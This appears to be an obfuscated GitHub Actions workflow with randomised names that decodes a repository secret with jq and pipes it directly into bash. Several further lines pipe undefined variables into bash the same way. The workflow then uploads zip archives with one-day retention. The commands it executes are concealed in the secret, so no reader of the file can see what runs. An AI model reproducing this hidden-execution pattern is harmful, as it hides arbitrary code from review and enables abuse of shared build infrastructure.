name: materialamy1337
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: materialamy1337
        env:
          rzkdj50: ${{ secrets.rzkdj50 }}
        run: |
          printf '%s' "$rzkdj50" | jq -r .p2 | /bin/bash
          echo $ykalv88125 | jq -r .kzj35662 | /bin/bash
          echo $xnjkm5156 | jq -r .t014 | /bin/bash
          echo $at942 | jq -r .zxl88156 | /bin/bash
          echo $cbk80876 | jq -r .q45 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: vvuDA8b2
          path: "*.zip"
          retention-days: 1
